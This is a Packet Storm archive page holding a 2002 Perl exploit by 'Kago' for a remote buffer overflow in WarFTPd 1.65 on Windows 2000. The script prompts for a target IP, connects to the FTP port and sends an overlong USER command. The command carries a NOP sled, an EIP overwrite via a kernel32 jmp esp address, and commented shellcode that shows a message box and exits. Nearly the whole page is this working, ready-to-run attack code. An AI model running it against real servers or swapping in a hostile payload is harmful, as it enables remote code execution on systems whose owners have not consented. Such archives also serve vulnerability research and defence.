what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

war-ftpd-bof.pl

war-ftpd-bof.pl
Posted May 29, 2002
Authored by Kago

WarFTPd v1.65 for Win2k remote buffer overflow exploit in win32 perl. Included shellcode pops up a message box.

tags | exploit, remote, overflow, perl, shellcode
systems | windows
SHA-256 | 4d51ac1438509a6db6d42e889b5f2204a336e230d13d61319f50f9395026bad2

war-ftpd-bof.pl

Change Mirror Download
use IO::Socket;
$port=21;
$|=1;

#Kernel32 jmp esp 7754a3ab
#Kernel32 MessageBoxA 77e375d5
#MSVCRT c_exit 78003985


print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";
print "\tEnter The Target IP :";

$ip = <STDIN>;
chomp $ip;



$host = inet_aton($ip);
$ServerAddr = sockaddr_in($port, $host);
$protocol_name = "tcp";
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
select(CLIENT); $|=1; select(STDOUT);
if(connect(CLIENT, $ServerAddr)) {
send(CLIENT,"user ",0);

send(CLIENT,"\x90"x485,0); #485 nops to overwrite EIP
send(CLIENT,"\xab\xa3\x54\x77",0); #Overwriting EIP with "jmp,esp" address via Kernel32.dll
send(CLIENT,"\x90"x5,0); #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c

send(CLIENT,"\x55",0); #push ebp - starting something new
send(CLIENT,"\x8b\xec",0); #mov ebp,esp
send(CLIENT,"\x33\xff",0); #xor edi,edi - edi = 0
send(CLIENT,"\x57",0); #push edi

send(CLIENT,"\xc6\x45\xfc\x48",0); #mov byte ptr [ebp-0x4],0x6f - H
send(CLIENT,"\xc6\x45\xfd\x69",0); #mov byte ptr [ebp-0x3],0x78 - i
send(CLIENT,"\xc6\x45\xfe\x21",0); #mov byte ptr [ebp-0x2],0x21 - !


send(CLIENT,"\xba\xd5\x75\xe3\x77",0); #mov edx, 0x77e375d5 - MessageBoxA to edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x57",0); #push edi
send(CLIENT,"\x8d\x55\xfc",0); #lea edx,[ebp-0x4] - move Hi! to edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x52",0); #push edx

send(CLIENT,"\x57",0); #push edi
send(CLIENT,"\xff\x55\xf8",0); #call dword ptr [ebp-0x8]
send(CLIENT,"\x55",0); #push ebp - Start the exit stuff so we don't crash
send(CLIENT,"\x8b\xec",0); #move ebp,esp
send(CLIENT,"\xba\x86\x41\x01\x89",0); #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
send(CLIENT,"\x81\xea\x01\x08\x01\x11",0); #sub edx, 0x11010201 - My leet-o way to get to the address with the null
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x33\xc0",0); #xor eax,eax
send(CLIENT,"\x50",0); #push eax
send(CLIENT,"\xff\x55\xfc",0); #call dword ptr [ebp-0x4]

send(CLIENT,"\n",0);

close(CLIENT);

}
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close